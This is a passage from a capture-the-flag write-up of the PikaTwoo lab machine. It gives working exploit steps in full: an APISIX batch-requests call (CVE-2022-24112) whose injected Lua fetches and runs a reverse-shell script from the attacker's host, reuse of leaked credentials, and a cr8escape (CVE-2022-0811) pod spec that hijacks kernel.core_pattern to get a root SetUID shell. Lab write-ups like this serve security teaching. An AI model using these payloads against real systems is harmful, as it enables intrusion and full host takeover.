k6F9/B2pnDFGToL8/Hf0zHpDanCw/tOJc9E2Ot4NP7tkGoWAQzMPaG90nHHI0CxyGeI4bZUMY6UWVe4j/Zf0pOTJG5QdlDB1nDxtqpGt29jpZPWrfyeEL6TA+2B6gDx0HScoLPIGTPe5DjuZxPI1SUrvUcTCZP8oah8g0BwsZWQJ9ZePesnlv0d5zXbm6FJNDNekpYde3S9MmqgbhOLeWJ4MmfGRfyoDLnrVAdiCWuj0nNCluPiNLhh1tcWmt9z7y3ZzzQu5EL4uN2b883Mz+HbZ5+1vs3iWdW0n6zx9GQUpwGl842q7FqUcdOg9/RWENZPtfUMZFD5uNkuApTTKlNtq7p7vlzxlr+TTwZCxWOa0uybNuyXCfTuTtjINzjw4SgjeXOjrKbBl4IuZnYjE9LBl2rVI8KZbPCjYyMSSFcqngp8kquQLu01FGxD36XUUaKdRQjydzYJaPvfjwEZo2p14xK/HsVwH8gNRZh5IupXwz/Dz5/siQn90oFb6+2iHQX7T7nfpde3rZvHhsbc5CpuaJdVR5NUf5IO7G04f7y2n7Ibf5lU/zKFiGzXbRLHfl5EclSKkosaJH7fbD3u479bvmbzGA+BQobtNZPIJmv3HZ6N9O6w/tnStY2bV6ovH0vjP99by3s3GI2N7mvX69259ede/vpr1O/aF3fd/fCYvQvaAu2716r9/sTrvNxv2g2R1/L6Cd+yFzHn7Sdu3n/QOq9+vTy3Z3J6wMkziWqY374N3et6a3zUHzdidATGY7p1a/vb0fTjv3nea0/ti/bnb67Ua9377vfPfe1S8HzW6/3WtOG7ftZqc/feze7saEyC6ZXb9innT0tnjmvIVq9/rNzltGVZKh4KXXQbc77X67fqvN/aHZ7P5+Mz8vHTLzg8eUzvsVwPG8G7ePksb69782d2OOnFQ09MLynL0JdK9f7++mP4LWb4G2E46+/KV/bAfVF0rfvUNf9IblPNjl94Ft5ME2fhvMinfn8v6u3u4ctKwH9p3tFpHV1rG3z6y3mbGTayTTo+HeYH/Tg9p2Qn6D+c3BK7TL+pYrpe01O+2U0BYIOnwhDdbFTbtUrg3vbL8Nr/KKwe30jSa+bUPj6cFGyj/wMpV/72XKN8hJbxWraYa5uL5KAtn8stfqGN1PsnEHitRSNXukLsbk2cvUfzcciN1+bLpK4li3bBUgp9eM9h+nWN5Re2P2QiftImgPfczRPbEygn/+giXLsrE7nPqRm+K8hQWY1xznCw9+eMw/POYfHvMDPOav0RImcz9NbPmgpw96+qCnH6EnzzY/aOmDlj5o6R1oKQ5ndynBnPofdPVBVx90dQBdHX05iqIHj2rlL0eJd/GolnEjHv3n/wUAAP//ULDU73DFAQA="
},
"type": "helm.sh/release.v1"
}
]
}
That has two interesting variables related to APISIX:
"APISIX_ADMIN_KEY": "YThjMmVmNWJjYzM3NmU5OTFhZjBiMjRkYTI5YzNhODc=",
"APISIX_VIEWER_KEY": "OTMzY2NjZmY4YjVkNDRmNTAyYTNmMGUwOTQ3NmIxMTg="
APISIX RCE
Strategy
I noted above a CVE in APISIX that this version would be vulnerable. It allowed bypassing of IP whitelisting, but also added that if the keys were left as default, it would give RCE. The keys were not left as default, but now that I’ve leaked them, it’s basically the same.
CVE-2022-24112 - An issue in the X-REAL-IP
header that allows for bypassing IP restrictions, and, if the default Admin Key is present, the batch-requests plugin will allow for remote code execution. This POC will exploit the vuln, but it doesn’t work here (likely because the default admin key was changed).
This repo has a POC, but it’s really just making two HTTP requests to the APISIX admin API, so I’ll do it manually to understand what’s happening.
Find API
APISIX is running on TCP 443 over HTTPS. The first request goes to /apisix/batch-requests
. If I curl
this from my host, it returns no route found:
oxdf@hacky$ curl -k https://10.10.11.199/apisix/batch-requests
{"error_msg":"404 Route Not Found"}
It’s important to do this as a POST request:
oxdf@hacky$ curl -k -X POST https://10.10.11.199/apisix/batch-requests
{"error_msg":"no request body, you should give at least one pipeline setting"}
Add Route
I’m going to add a route to the API that gives me a reverse shell. I’m going to need to hit the above endpoint with the following:
-
Header:
Content-type: application/json
- so that the body is correctly interpreted -
Body: The following JSON blob that describes a request that will be made:
{ "headers": { "X-API-KEY": "a8c2ef5bcc376e991af0b24da29c3a87" }, "timeout": 1500, "pipeline": [ { "path": "/apisix/admin/routes/index", "method": "PUT", "body": "{\"uri\":\"/shell/0xdf\",\"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"127.0.0.1\":1}},\"name\":\"shell\",\"filter_func\":\"function(vars) os.execute(\\\"curl http://10.10.14.6/rev -o /tmp/0xdf; bash /tmp/0xdf\\\"); return true end\"}" } ] }
This will cause APISIX’s admin feature to make a PUT request to
/apisix/admin/routes/index
to create a route at/shell/0xdf
. That will executecurl http://10.10.14.6/rev -o /tmp/0xdf; bash /tmp/0xdf
, which hascurl
to fetch a script namedrev
from my server and then run it withbash
. I updated theX-API-KEY
header with the leaked key.
All together, that curl
command looks like (using jq
to pretty print the JSON response):
oxdf@hacky$ curl -sk -H "Content-Type: application/json" -X POST "https://10.10.11.199/apisix/batch-requests" -d '{"headers": {"X-API-KEY": "a8c2ef5bcc376e991af0b24da29c3a87"}, "timeout": 1500, "pipeline": [{"path": "/apisix/admin/routes/index", "method": "PUT", "body": "{\"uri\":\"/shell/0xdf\",\"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"127.0.0.1\":1}},\"name\":\"shell\",\"filter_func\":\"function(vars) os.execute(\\\"curl http://10.10.14.6/rev -o /tmp/0xdf; bash /tmp/0xdf\\\"); return true end\"}"}]}' | jq .
[
{
"headers": {
"Access-Control-Allow-Credentials": "true",
"Server": "APISIX/2.10.1",
"Content-Type": "application/json",
"Transfer-Encoding": "chunked",
"Access-Control-Expose-Headers": "*",
"Access-Control-Allow-Origin": "*",
"Access-Control-Max-Age": "3600",
"Connection": "close",
"Date": "Wed, 30 Aug 2023 21:09:09 GMT"
},
"status": 200,
"body": "{\"action\":\"set\",\"node\":{\"key\":\"\\/apisix\\/routes\\/index\",\"value\":{\"update_time\":1693429749,\"priority\":0,\"upstream\":{\"type\":\"roundrobin\",\"pass_host\":\"pass\",\"nodes\":{\"127.0.0.1\":1},\"hash_on\":\"vars\",\"scheme\":\"http\"},\"filter_func\":\"function(vars) os.execute(\\\"curl http:\\/\\/10.10.14.6\\/rev -o \\/tmp\\/0xdf; bash \\/tmp\\/0xdf\\\"); return true end\",\"status\":1,\"name\":\"shell\",\"id\":\"index\",\"uri\":\"\\/shell\\/0xdf\",\"create_time\":1693429744}}}\n",
"reason": "OK"
}
]
It reports success.
Shell
With that endpoint created, I’ll hit it to trigger the reverse shell:
oxdf@hacky$ curl -k https://10.10.11.199/shell/0xdf
It hangs, but there’s a request at my webserver:
10.10.11.199 - - [30/Aug/2023 17:10:12] "GET /rev HTTP/1.1" 200 -
And then a shell at nc
:
oxdf@hacky$ nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.199 42778
bash: cannot set terminal process group (1): Not a tty
bash: no job control in this shell
bash-5.1$ id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
bash-5.1$ hostname
apisix-7dd469755b-qtzd7
This is the APISIX pod.
I’ll upgrade the shell:
bash-5.1$ script /dev/null -c bash
script /dev/null -c bash
Script started, output log file is '/dev/null'.
bash-5.1$ ^Z
[1]+ Stopped nc -lnvp 444
oxdf@hacky$ stty raw -echo; fg
nc -lnvp 444
reset
bash-5.1$
Shell as Andrew
Enumeration
This is another pod, and it’s very empty. I’ll try to find the APISIX configs. There’s nothing in /etc/
of interest (including nginx and APISIX):
bash-5.1$ ls /etc/
alpine-release issue profile
apk logrotate.d profile.d
ca-certificates modprobe.d protocols
ca-certificates.conf modules resolv.conf
conf.d modules-load.d securetty
crontabs motd services
fstab mtab shadow
group network shells
hostname openldap ssl
hosts opt sysctl.conf
init.d os-release sysctl.d
inittab passwd terminfo
inputrc periodic udhcpd.conf
The docs show APISIX uses a config.yaml
file. There’s on in /usr/local/apisix/conf/
:
bash-5.1$ find . -name config.yaml 2>/dev/null
./usr/local/apisix/conf/config.yaml
The file has a lot of information in it, but one part jumps out:
discovery:
eureka:
fetch_interval: 30
host:
- http://andrew:st41rw4y2h34v3n@evolution.pokatmon.htb:8888
prefix: /eureka/
timeout:
connect: 2000
read: 5000
send: 2000
weight: 100
There’s a password for andrew in that URL, as well as a new domain.
I’m not able to find anything that resolves to evolution.pokatmon.htb
in any of the containers or see anything different from my VM.
SSH
That password does work for the andrew user on PikaTwoo:
oxdf@hacky$ sshpass -p 'st41rw4y2h34v3n' ssh andrew@10.10.11.199
Linux pikatwoo.pokatmon.htb 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64
...[snip]...
andrew@pikatwoo:~$
And I finally get user.txt
:
andrew@pikatwoo:~$ cat user.txt
42845633************************
Shell as root
Enumeration
Home Directories
andrew’s home directory is relatively empty:
andrew@pikatwoo:~$ ls -la
total 28
drwxr-xr-x 3 root andrew 4096 Nov 10 2022 .
drwxr-xr-x 4 root root 4096 Nov 8 2022 ..
lrwxrwxrwx 1 root root 9 Mar 30 2022 .bash_history -> /dev/null
-rw-r--r-- 1 andrew andrew 220 Apr 18 2019 .bash_logout
-rw-r--r-- 1 andrew andrew 3526 Apr 18 2019 .bashrc
drwxr-xr-x 2 andrew users 4096 Nov 10 2022 Documents
-rw-r--r-- 1 andrew andrew 807 Apr 18 2019 .profile
-rw-r----- 1 root andrew 33 Aug 25 21:27 user.txt
There’s one other user, jennifer, and their home directory is listable:
andrew@pikatwoo:/home$ ls
andrew jennifer
andrew@pikatwoo:/home$ ls -la jennifer/
total 44
drwxr-xr-x 7 root jennifer 4096 Jan 17 2023 .
drwxr-xr-x 4 root root 4096 Nov 8 2022 ..
lrwxrwxrwx 1 root root 9 Mar 31 2022 .bash_history -> /dev/null
-rw-r----- 1 root jennifer 220 Mar 10 2022 .bash_logout
-rw-r----- 1 root jennifer 3526 Mar 10 2022 .bashrc
drwxr-x--- 2 root jennifer 4096 Mar 10 2022 .cache
drwxr-x--- 3 root jennifer 4096 Mar 10 2022 .config
drwxr-x--- 2 jennifer jennifer 4096 Mar 31 2022 Documents
drwxr-x--- 3 root users 4096 Mar 18 2022 .kube
drwxr-x--- 10 root users 4096 Mar 18 2022 .minikube
-rw-r----- 1 root jennifer 807 Mar 10 2022 .profile
-rwxr-x--- 1 root users 145 Jan 17 2023 template.yaml
template.yaml
, as well as the .kube
and .minikube
directories are part of the users group, of which andrew is a member:
andrew@pikatwoo:~$ id
uid=1001(andrew) gid=1001(andrew) groups=1001(andrew),100(users)
The template file gives the name of a container that presumably exists on PikaTwoo (since it won’t be able to reach the internet to download others):
apiVersion: v1
kind: Pod
metadata:
name: template-pod
spec:
containers:
- name: alpine
image: alpine:latest
imagePullPolicy: Never
I’ll keep in mind to use alpine:latest
when creating containers later.
Kubernetes API
kubectl
is installed on the host for managing Kubernetes. andrew isn’t able to interact with it:
andrew@pikatwoo:~$ kubectl get pods
Error from server: the server responded with the status code 412 but did not return more information
But using jennifer’s config works, kind of:
andrew@pikatwoo:~$ kubectl --kubeconfig /home/jennifer/.kube/config get pods
Error from server (Forbidden): pods is forbidden: User "jennifer" cannot list resource "pods" in API group "" in the namespace "default"
I’m able to interact with the Kubernetes API, but only to learn that jennifer doesn’t have permissions to list pods in default. I’ll try the namespace from the pokatdex-api pod, applications, but same thing:
andrew@pikatwoo:~$ kubectl --kubeconfig /home/jennifer/.kube/config --namespace applications get pods
Error from server (Forbidden): pods is forbidden: User "jennifer" cannot list resource "pods" in API group "" in the namespace "applications"
jennifer does have the ability to list the namespaces:
andrew@pikatwoo:~$ kubectl --kubeconfig /home/jennifer/.kube/config --namespace applications get namespaces
NAME STATUS AGE
applications Active 531d
default Active 531d
development Active 293d
kube-node-lease Active 531d
kube-public Active 531d
kube-system Active 531d
jennifer is not able to list pods in any of those either:
andrew@pikatwoo:~$ kubectl --kubeconfig /home/jennifer/.kube/config --namespace development get pods
Error from server (Forbidden): pods is forbidden: User "jennifer" cannot list resource "pods" in API group "" in the namespace "development"
andrew@pikatwoo:~$ kubectl --kubeconfig /home/jennifer/.kube/config --namespace kube-node-lease get pods
Error from server (Forbidden): pods is forbidden: User "jennifer" cannot list resource "pods" in API group "" in the namespace "kube-node-lease"
andrew@pikatwoo:~$ kubectl --kubeconfig /home/jennifer/.kube/config --namespace kube-public get pods
Error from server (Forbidden): pods is forbidden: User "jennifer" cannot list resource "pods" in API group "" in the namespace "kube-public"
andrew@pikatwoo:~$ kubectl --kubeconfig /home/jennifer/.kube/config --namespace kube-system get pods
Error from server (Forbidden): pods is forbidden: User "jennifer" cannot list resource "pods" in API group "" in the namespace "kube-system"
Minikube Server
Looking at jennifer’s Kubernetes config, it is looking for a minikube server at 192.168.49.2:
apiVersion: v1
clusters:
- cluster:
certificate-authority: /home/jennifer/.minikube/ca.crt
extensions:
- extension:
last-update: Fri, 18 Mar 2022 10:23:04 GMT
provider: minikube.sigs.k8s.io
version: v1.25.2
name: cluster_info
server: https://192.168.49.2:8443
name: minikube
contexts:
- context:
cluster: minikube
user: jennifer
name: jennifer-context
current-context: jennifer-context
kind: Config
preferences: {}
users:
- name: jennifer
user:
client-certificate: /home/jennifer/.minikube/profiles/minikube/jennifer.crt
client-key: /home/jennifer/.minikube/profiles/minikube/jennifer.key
That’s not this host, but this host does have the .1 IP for that network on it’s cni-podman0
adapter:
andrew@pikatwoo:/home/jennifer/.kube$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:d0:f3 brd ff:ff:ff:ff:ff:ff
altname enp11s0
altname ens192
inet 10.10.11.199/23 brd 10.10.11.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:d0f3/64 scope global dynamic mngtmpaddr
valid_lft 86400sec preferred_lft 14400sec
inet6 fe80::250:56ff:feb9:d0f3/64 scope link
valid_lft forever preferred_lft forever
3: cni-podman0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
link/ether a6:9b:3a:63:07:c3 brd ff:ff:ff:ff:ff:ff
inet 192.168.49.1/24 brd 192.168.49.255 scope global cni-podman0
valid_lft forever preferred_lft forever
inet6 fe80::a49b:3aff:fe63:7c3/64 scope link
valid_lft forever preferred_lft forever
4: vethb5c6d31e@if3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master cni-podman0 state UP group default
link/ether 66:8e:c1:e6:ed:52 brd ff:ff:ff:ff:ff:ff link-netns cni-4b6c723d-bdcc-8dd3-7928-5084ec345fbd
inet6 fe80::24a1:5ff:fefd:539d/64 scope link
valid_lft forever preferred_lft forever
Podman is an open source alternative to Docker for running containers.
Identify cr8escape
Identifying Vulnerability
minikube is the software running Kubernetes on this host. It’s running version 1.28.0-0:
andrew@pikatwoo:~$ dpkg -l | grep minikube
hi minikube 1.28.0-0 amd64 Minikube
Some searching for minikube vulnerabilities turns up a post from Crowdstrike, cr8escape: New Vulnerability in CRI-O Container Engine Discovered by CrowdStrike (CVE-2022-0811). It says:
Kubernetes uses a container runtime like CRI-O or Docker to safely share each node’s kernel and resources with the various containerized applications running on it. The Linux kernel accepts runtime parameters that control its behavior. Some parameters are namespaced and can therefore be set in a single container without impacting the system at large. Kubernetes and the container runtimes it drives allow pods to update these “safe” kernel settings while blocking access to others.
CrowdStrike’s Cloud Threat Research team discovered a flaw introduced in CRI-O version 1.19 that allows an attacker to bypass these safeguards and set arbitrary kernel parameters on the host. As a result of CVE-2022-0811, anyone with rights to deploy a pod on a Kubernetes cluster that uses the CRI-O runtime can abuse the “kernel.core_pattern” parameter to achieve container escape and arbitrary code execution as root on any node in the cluster.
The NIST page on the CVE has the exact versions that are vulnerable:
So how to check if it’s using CRI-O and what version? I’ll grep
through jennifer’s home directory for cri-o
:
andrew@pikatwoo:/home/jennifer$ grep -ir cri-o . 2>/dev/null
./.minikube/logs/lastStart.txt:I0318 10:22:24.318492 443 preload.go:148] Found local preload: /root/.minikube/cache/preloaded-tarball/preloaded-images-k8s-v17-v1.23.3-cri-o-overlay-amd64.tar.lz4
./.minikube/logs/lastStart.txt:I0318 10:22:24.318770 443 preload.go:174] Found /root/.minikube/cache/preloaded-tarball/preloaded-images-k8s-v17-v1.23.3-cri-o-overlay-amd64.tar.lz4 in cache, skipping download
./.minikube/logs/lastStart.txt:RuntimeName: cri-o
./.minikube/logs/lastStart.txt:I0318 10:22:33.615621 443 out.go:176] * Preparing Kubernetes v1.23.3 on CRI-O 1.22.1 ...
./.minikube/logs/lastStart.txt:I0318 10:22:34.100346 443 crio.go:491] all images are preloaded for cri-o runtime.
./.minikube/logs/lastStart.txt:I0318 10:22:34.137911 443 crio.go:491] all images are preloaded for cri-o runtime.
./.minikube/profiles/minikube/events.json:{"specversion":"1.0","id":"df4c253d-79e0-4fbc-a5d4-b2c9f4651f6f","source":"https://minikube.sigs.k8s.io/","type":"io.k8s.sigs.minikube.step","datacontenttype":"application/json","data":{"currentstep":"11","message":"* Preparing Kubernetes v1.23.3 on CRI-O 1.22.1 ...","name":"Preparing Kubernetes","totalsteps":"19"}}
The last line gives the CRI-O version of 1.22.1, which should be vulnerable according to that NIST chart.
Cr8Escape Background
I’ve actually exploited this vulnerability before in Vessel, although it wasn’t in the context of Kubernetes. The issue is that Kubernetes and CRI-O let a container set arbitrary kernel options using the +
delimiter. Once something can do that, there are ways to leverage that to get execution as root. In this example (and Vessel’s), I’ll set the path to the script that will run (as root) on a crashdump to something I control, and then crash a process.
In Vessel, this was accompished via a SetGID pinns
binary. In PikaTwoo, it’s via Kubernetes. Kubernetes only allows for some safe kernel options to be set via the config YAML file. It takes the value from that file and passes it to pinns
to set the options. Unfortunately, it doesn’t sanitize the +
character, which is similar to what &
does in a HTTP request.
To exploit this, I’ll set a safe / allowed option to [dummy value]+[unsafe option]=[value]
. This will inject the setting of [unsafe option]
, even though I’m not supposed to be allowed to set that.
Cr8Escape POC
Strategy
The CrowdStrike post gives the steps to reproduce this vulnerability, but it’s much more complicated than what is necessary here. In the post, it’s designed for a scenario where I have access to create pods, but not to the host file system (for example, AWS’s EKS Kubernetes service). In this scenario, the steps to exploit are:
- Create a pod and put a malicious script in it.
- Create a second pod that exploits the process by injecting kernel options to set the malicious script to be run on a crash. To do this, I’ll need to figure out the path in OverlayFS.
- Go into the first pod and crash a process, triggering the script from the host.
In this scenario, I’ll do the same thing, but I don’t need the first pod. I can:
- Create a script anywhere on the host.
- Create a pod to set the kernel option.
- Trigger the crash from the host.
This is very similar to what I did on Vessel, though through Kubernetes this time.
If I didn’t have access to the host filesystem for some reason, I could set up my own local instance of Minikube to look like this one by installing Minikube, and then starting with these instructions like minikube start --driver=podman --container-runtime=cri-o
. This creates a Minikube controller in a Podman container like in PikaTwoo.
Create Script
I’ll put a simple script in a writable location like /home/andrew/Documents/
and make it executable:
andrew@pikatwoo:~/Documents$ vim.tiny 0xdf.sh
andrew@pikatwoo:~/Documents$ chmod +x 0xdf.sh
andrew@pikatwoo:~/Documents$ cat 0xdf.sh
#!/bin/bash
touch /tmp/0xdf
This script will touch the file /tmp/0xdf
.
Modify Kernel Options
I’ll use the exploit template from the Crowdstrike blog post to make a container:
apiVersion: v1
kind: Pod
metadata:
name: sysctl-set
spec:
securityContext:
sysctls:
- name: kernel.shm_rmid_forced
value: "1+kernel.core_pattern=|/home/andrew/Documents/0xdf.sh #"
containers:
- name: alpine
image: alpine:latest
command: ["tail", "-f", "/dev/null"]
This will inject the kernel.core_pattern
option to point at my script.
Trying to create the pod is met with another lack of permissions error:
andrew@pikatwoo:~/Documents$ kubectl --kubeconfig /home/jennifer/.kube/config create -f sysctl-set.yaml
Error from server (Forbidden): error when creating "sysctl-set.yaml": pods is forbidden: User "jennifer" cannot create resource "pods" in API group "" in the namespace "default"
I’ll try in different namespaces. It also fails in applications, but in development it works!
andrew@pikatwoo:~/Documents$ kubectl --kubeconfig /home/jennifer/.kube/config create -f sysctl-set.yaml -n applications
Error from server (Forbidden): error when creating "sysctl-set.yaml": pods is forbidden: User "jennifer" cannot create resource "pods" in API group "" in the namespace "applications"
andrew@pikatwoo:~/Documents$ kubectl --kubeconfig /home/jennifer/.kube/config create -f sysctl-set.yaml -n development
pod/sysctl-set created
I can check now that the kernel option is set:
andrew@pikatwoo:~/Documents$ cat /proc/sys/kernel/core_pattern
|/home/andrew/Documents/0xdf.sh #'
Trigger Exploit
I’ll start a process that runs in the background:
andrew@pikatwoo:~/Documents$ tail -f /dev/null &
[1] 19090
tail -f /dev/null
will continue to try to read from nothing indefinitely. Because it’s in the background (&
), it gives the pid of that process.
I’ll enable crashdumps:
andrew@pikatwoo:~/Documents$ ulimit -c
0
andrew@pikatwoo:~/Documents$ ulimit -c unlimited
andrew@pikatwoo:~/Documents$ ulimit -c
unlimited
I’ll kill my process, creating a crashdump and triggering my exploit, creating the file in /tmp
:
andrew@pikatwoo:~/Documents$ kill -SIGSEGV 19090
[1]+ Segmentation fault (core dumped) tail -f /dev/null
andrew@pikatwoo:~/Documents$ ls -l /tmp/
total 0
-rw-r--r-- 1 root root 0 Sep 5 19:26 0xdf
Shell
To get a shell, I’ll simply update 0xdf.sh
to create a SetUID/SetGID copy of bash
:
#!/bin/bash
cp /bin/bash /tmp/0xdf-bash
chmod 6777 /tmp/0xdf-bash
Now I crash another process:
andrew@pikatwoo:~/Documents$ tail -f /dev/null &
[1] 54964
andrew@pikatwoo:~/Documents$ kill -SIGSEGV 54964
And start my shell:
andrew@pikatwoo:~/Documents$ /tmp/0xdf-bash -p
0xdf-bash-5.1#
I’m able to read the flag:
0xdf-bash-5.1# cat /root/root.txt
0f945ad0************************